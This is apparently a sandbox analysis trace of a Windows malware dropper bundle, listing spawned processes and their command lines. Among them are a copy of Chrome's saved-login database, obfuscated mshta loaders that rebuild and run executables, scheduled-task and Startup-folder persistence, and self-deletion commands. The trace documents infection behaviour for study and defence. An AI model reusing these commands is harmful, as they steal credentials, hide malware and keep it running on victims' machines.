C:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe
4⤵
PID:2788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe
4⤵
PID:1948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed094c47c32b.exe
4⤵
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe
4⤵
PID:2660

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:4628

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Pictures\Adobe Films\iDy7r92AdHoe594PiOA4dmf8.exe"
3⤵
PID:1016

C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
3⤵
PID:8060

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:4852

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
2⤵
PID:5176

C:\Users\Admin\AppData\Local\Temp\A05E.exe
C:\Users\Admin\AppData\Local\Temp\A05E.exe
2⤵
PID:6828

C:\Users\Admin\AppData\Local\Temp\A05E.exe
C:\Users\Admin\AppData\Local\Temp\A05E.exe
3⤵
PID:4828

C:\Users\Admin\AppData\Local\Temp\F7A6.exe
C:\Users\Admin\AppData\Local\Temp\F7A6.exe
2⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\B10.exe
C:\Users\Admin\AppData\Local\Temp\B10.exe
2⤵
PID:8168

C:\Users\Admin\AppData\Local\Temp\2EE5.exe
C:\Users\Admin\AppData\Local\Temp\2EE5.exe
2⤵
PID:4152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 2EE5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2EE5.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:9600

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 2EE5.exe /f
4⤵
- Kills process with taskkill
PID:10020

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:4136

C:\Users\Admin\AppData\Local\Temp\4358.exe
C:\Users\Admin\AppData\Local\Temp\4358.exe
2⤵
PID:2312

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
3⤵
PID:5852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
4⤵
PID:7740

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
5⤵
PID:7808

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
4⤵
- Creates scheduled task(s)
PID:7100

C:\Users\Admin\AppData\Local\Temp\A7D0.exe
C:\Users\Admin\AppData\Local\Temp\A7D0.exe
2⤵
PID:7860

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:4032

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\B85C.dll
2⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\C618.exe
C:\Users\Admin\AppData\Local\Temp\C618.exe
2⤵
PID:7476

C:\Users\Admin\AppData\Local\Temp\EE71.exe
C:\Users\Admin\AppData\Local\Temp\EE71.exe
2⤵
PID:1864

C:\Users\Admin\AppData\Local\Temp\EE1.exe
C:\Users\Admin\AppData\Local\Temp\EE1.exe
2⤵
PID:7420

C:\Users\Admin\AppData\Local\Temp\EE1.exe
C:\Users\Admin\AppData\Local\Temp\EE1.exe
3⤵
PID:9012

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\e1385b57-9353-424f-b646-b905838e3d41" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:5080

C:\Users\Admin\AppData\Local\Temp\EE1.exe
"C:\Users\Admin\AppData\Local\Temp\EE1.exe" --Admin IsNotAutoStart IsNotTask
4⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\EE1.exe
"C:\Users\Admin\AppData\Local\Temp\EE1.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:9688

C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build2.exe
"C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build2.exe"
6⤵
PID:1768

C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build2.exe
"C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build2.exe"
7⤵
PID:9172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build2.exe" & del C:\ProgramData\*.dll & exit
8⤵
PID:6752

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
9⤵
- Kills process with taskkill
PID:9948

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
9⤵
- Delays execution with timeout.exe
PID:9988

C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build3.exe
"C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build3.exe"
6⤵
PID:4984

C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build3.exe
"C:\Users\Admin\AppData\Local\4f226b75-ec06-4136-92ae-3dd946329a17\build3.exe"
7⤵
PID:4380

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
8⤵
- Creates scheduled task(s)
PID:8340

C:\Users\Admin\AppData\Local\Temp\1395.exe
C:\Users\Admin\AppData\Local\Temp\1395.exe
2⤵
PID:10204

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 1395.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1395.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:8268

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 1395.exe /f
4⤵
- Kills process with taskkill
PID:300

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:5844

C:\Users\Admin\AppData\Local\Temp\178E.exe
C:\Users\Admin\AppData\Local\Temp\178E.exe
2⤵
PID:3184

C:\Users\Admin\AppData\Local\Temp\2059.exe
C:\Users\Admin\AppData\Local\Temp\2059.exe
2⤵
PID:8912

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\2059.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\2059.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )
3⤵
PID:9024

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\2059.exe" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\2059.exe") do taskkill /iM "%~nXN" -f
4⤵
PID:4240

C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE
MXB89oH1.eXE /poMZbeSahrmSD~4GRjd
5⤵
PID:8444

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )
6⤵
PID:8556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE") do taskkill /iM "%~nXN" -f
7⤵
PID:8408

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ("wscRiPt.shElL"). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP+ P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ ", 0, TRue ) )
6⤵
PID:7584

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3+ TBFC27.HKL+G2K6.CP+P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ
7⤵
PID:2656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
8⤵
PID:7384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"
8⤵
PID:8108

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\YFYnG.AJ
8⤵
PID:424

C:\Windows\SysWOW64\taskkill.exe
taskkill /iM "2059.exe" -f
5⤵
- Kills process with taskkill
PID:9472

C:\Users\Admin\AppData\Local\Temp\2914.exe
C:\Users\Admin\AppData\Local\Temp\2914.exe
2⤵
PID:7812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
PID:6424

C:\Program Files (x86)\Jqfbx\zjjerap.exe
"C:\Program Files (x86)\Jqfbx\zjjerap.exe"
2⤵
PID:2656

C:\Users\Admin\AppData\Local\Temp\8622.exe
C:\Users\Admin\AppData\Local\Temp\8622.exe
2⤵
PID:5444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:9412

C:\Users\Admin\AppData\Local\Temp\9B51.exe
C:\Users\Admin\AppData\Local\Temp\9B51.exe
2⤵
PID:1148

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09b2a8bc4f16cb.exe
Wed09b2a8bc4f16cb.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2576

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09abf83d9c2.exe
Wed09abf83d9c2.exe
1⤵
- Executes dropped EXE
PID:3200

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09abf83d9c2.exe
"C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09abf83d9c2.exe" -u
2⤵
- Executes dropped EXE
PID:3424

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09977fdc12334.exe
Wed09977fdc12334.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:1772

C:\Users\Admin\Pictures\Adobe Films\yv_WxKr3KFtEgviNW6XER0DN.exe
"C:\Users\Admin\Pictures\Adobe Films\yv_WxKr3KFtEgviNW6XER0DN.exe"
2⤵
- Executes dropped EXE
PID:5076

C:\Users\Admin\Pictures\Adobe Films\WJ4Jp9BzJkMkcxTsUZxDV8_F.exe
"C:\Users\Admin\Pictures\Adobe Films\WJ4Jp9BzJkMkcxTsUZxDV8_F.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5516

C:\Users\Admin\Pictures\Adobe Films\iDy7r92AdHoe594PiOA4dmf8.exe
"C:\Users\Admin\Pictures\Adobe Films\iDy7r92AdHoe594PiOA4dmf8.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5488

C:\Users\Admin\Pictures\Adobe Films\heLdzdnLl5q5AkvLGStJu8xP.exe
"C:\Users\Admin\Pictures\Adobe Films\heLdzdnLl5q5AkvLGStJu8xP.exe"
2⤵
- Executes dropped EXE
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 656
3⤵
- Program crash
PID:7012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 672
3⤵
- Program crash
PID:3288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 680
3⤵
- Program crash
PID:6912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 664
3⤵
- Program crash
PID:6220

C:\Users\Admin\Pictures\Adobe Films\yU9A50kXOGuIyzhRuVL5irvz.exe
"C:\Users\Admin\Pictures\Adobe Films\yU9A50kXOGuIyzhRuVL5irvz.exe"
2⤵
- Executes dropped EXE
PID:5460

C:\Users\Admin\Pictures\Adobe Films\rB8pSJCQHjIxwe2pFQq4cLX7.exe
"C:\Users\Admin\Pictures\Adobe Films\rB8pSJCQHjIxwe2pFQq4cLX7.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5452

C:\Users\Admin\Documents\UiHavVmyS7tmxL43iWYAXJ0J.exe
"C:\Users\Admin\Documents\UiHavVmyS7tmxL43iWYAXJ0J.exe"
3⤵
PID:5048

C:\Users\Admin\Pictures\Adobe Films\ulaar46vferfZdxeRROA7gAO.exe
"C:\Users\Admin\Pictures\Adobe Films\ulaar46vferfZdxeRROA7gAO.exe"
4⤵
PID:1716

C:\Users\Admin\Pictures\Adobe Films\L1vOAGnZKKOdYoeSK0nGQdJT.exe
"C:\Users\Admin\Pictures\Adobe Films\L1vOAGnZKKOdYoeSK0nGQdJT.exe"
4⤵
PID:7288

C:\Users\Admin\Pictures\Adobe Films\J8R0AtbOs1rm63LpnHWgJZ53.exe
"C:\Users\Admin\Pictures\Adobe Films\J8R0AtbOs1rm63LpnHWgJZ53.exe"
4⤵
PID:7416

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:3980

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:7220

C:\Users\Admin\Pictures\Adobe Films\3Uqxfc_6vUg9_RxO6PbAHdax.exe
"C:\Users\Admin\Pictures\Adobe Films\3Uqxfc_6vUg9_RxO6PbAHdax.exe"
4⤵
PID:7408

C:\Users\Admin\Pictures\Adobe Films\Qkd1QrDaBrzQeKPJPq2vOmgc.exe
"C:\Users\Admin\Pictures\Adobe Films\Qkd1QrDaBrzQeKPJPq2vOmgc.exe"
4⤵
PID:7516

C:\Users\Admin\Pictures\Adobe Films\ZF35w9iF8iuM11Z7kt0G_wOl.exe
"C:\Users\Admin\Pictures\Adobe Films\ZF35w9iF8iuM11Z7kt0G_wOl.exe"
4⤵
PID:7800

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\ZF35w9iF8iuM11Z7kt0G_wOl.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\ZF35w9iF8iuM11Z7kt0G_wOl.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
5⤵
PID:7120

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\ZF35w9iF8iuM11Z7kt0G_wOl.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\ZF35w9iF8iuM11Z7kt0G_wOl.exe" ) do taskkill -f -iM "%~NxM"
6⤵
PID:7852

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
7⤵
PID:3900

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
8⤵
PID:7376

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
9⤵
PID:604

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
8⤵
PID:5772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
9⤵
PID:5568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
10⤵
PID:7268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
10⤵
PID:7192

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
10⤵
PID:7980

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "ZF35w9iF8iuM11Z7kt0G_wOl.exe"
7⤵
- Kills process with taskkill
PID:7488

C:\Users\Admin\Pictures\Adobe Films\t4B1XCHYB7eC7yEawc2cjd5y.exe
"C:\Users\Admin\Pictures\Adobe Films\t4B1XCHYB7eC7yEawc2cjd5y.exe"
4⤵
PID:7836

C:\Users\Admin\AppData\Local\Temp\is-Q4UBC.tmp\t4B1XCHYB7eC7yEawc2cjd5y.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q4UBC.tmp\t4B1XCHYB7eC7yEawc2cjd5y.tmp" /SL5="$403E6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\t4B1XCHYB7eC7yEawc2cjd5y.exe"
5⤵
PID:8068

C:\Users\Admin\AppData\Local\Temp\is-HQ5HI.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-HQ5HI.tmp\DYbALA.exe" /S /UID=2709
6⤵
PID:7328

C:\Program Files\Windows Defender\PQYKPAKYKD\foldershare.exe
"C:\Program Files\Windows Defender\PQYKPAKYKD\foldershare.exe" /VERYSILENT
7⤵
PID:7624

C:\Users\Admin\AppData\Local\Temp\ac-cc7c3-b86-e1c88-f419f1db6849e\Jilygusuda.exe
"C:\Users\Admin\AppData\Local\Temp\ac-cc7c3-b86-e1c88-f419f1db6849e\Jilygusuda.exe"
7⤵
PID:3656

C:\Users\Admin\AppData\Local\Temp\e5-50a61-8b9-cff93-16732c654ebdc\Naretaeceli.exe
"C:\Users\Admin\AppData\Local\Temp\e5-50a61-8b9-cff93-16732c654ebdc\Naretaeceli.exe"
7⤵
PID:4276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lorfi0yg.wt4\GcleanerEU.exe /eufive & exit
8⤵
PID:9236

C:\Users\Admin\AppData\Local\Temp\lorfi0yg.wt4\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\lorfi0yg.wt4\GcleanerEU.exe /eufive
9⤵
PID:10052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ooewycp5.yoj\installer.exe /qn CAMPAIGN="654" & exit
8⤵
PID:9356

C:\Users\Admin\AppData\Local\Temp\ooewycp5.yoj\installer.exe
C:\Users\Admin\AppData\Local\Temp\ooewycp5.yoj\installer.exe /qn CAMPAIGN="654"
9⤵
PID:10124

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ooewycp5.yoj\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ooewycp5.yoj\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635085641 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
10⤵
PID:7244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\voji2wih.3nw\any.exe & exit
8⤵
PID:9496

C:\Users\Admin\AppData\Local\Temp\voji2wih.3nw\any.exe
C:\Users\Admin\AppData\Local\Temp\voji2wih.3nw\any.exe
9⤵
PID:9164

C:\Users\Admin\AppData\Local\Temp\voji2wih.3nw\any.exe
"C:\Users\Admin\AppData\Local\Temp\voji2wih.3nw\any.exe" -u
10⤵
PID:9136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b02e35u5.u24\gcleaner.exe /mixfive & exit
8⤵
PID:9728

C:\Users\Admin\AppData\Local\Temp\b02e35u5.u24\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\b02e35u5.u24\gcleaner.exe /mixfive
9⤵
PID:9320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jbwqgjv5.d1o\autosubplayer.exe /S & exit
8⤵
PID:9856

C:\Users\Admin\Pictures\Adobe Films\NvVYDrh3uiPEFVfrmJoqRxi2.exe
"C:\Users\Admin\Pictures\Adobe Films\NvVYDrh3uiPEFVfrmJoqRxi2.exe"
4⤵
PID:7704

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
5⤵
PID:5140

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
6⤵
PID:7840

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1dc,0x1d8,0x1e4,0x1d4,0x7fff042fdec0,0x7fff042fded0,0x7fff042fdee0
7⤵
PID:8768

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,3370746426114661389,2374291938337839391,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7840_1077984654" --mojo-platform-channel-handle=1656 /prefetch:8
7⤵
PID:8180

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5716

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5676

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1156

C:\Users\Admin\Pictures\Adobe Films\l52IOPxC8IZszZcHKSzkolDA.exe
"C:\Users\Admin\Pictures\Adobe Films\l52IOPxC8IZszZcHKSzkolDA.exe"
2⤵
- Executes dropped EXE
PID:5444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im l52IOPxC8IZszZcHKSzkolDA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\l52IOPxC8IZszZcHKSzkolDA.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:8060

C:\Windows\SysWOW64\taskkill.exe
taskkill /im l52IOPxC8IZszZcHKSzkolDA.exe /f
4⤵
- Kills process with taskkill
PID:6868

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:9044

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09d27135e5a8b3b.exe
Wed09d27135e5a8b3b.exe
1⤵
- Executes dropped EXE
PID:2160

C:\Users\Admin\AppData\Local\Temp\is-HBAAJ.tmp\Wed09d27135e5a8b3b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HBAAJ.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$40138,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09d27135e5a8b3b.exe"
2⤵
PID:2728

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09d27135e5a8b3b.exe
"C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09d27135e5a8b3b.exe" /SILENT
3⤵
- Executes dropped EXE
PID:3724

C:\Users\Admin\AppData\Local\Temp\is-VLV72.tmp\Wed09d27135e5a8b3b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VLV72.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$8007E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed09d27135e5a8b3b.exe" /SILENT
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1800

C:\Users\Admin\AppData\Local\Temp\is-MVUL8.tmp\postback.exe
"C:\Users\Admin\AppData\Local\Temp\is-MVUL8.tmp\postback.exe" ss1
5⤵
- Executes dropped EXE
PID:4676

C:\Users\Admin\AppData\Local\Temp\7zS823188E5\Wed094c47c32b.exe
Wed094c47c32b.exe
1⤵
- Executes dropped EXE
PID:3452

C:\Windows\SysWOW64\mshta.exe
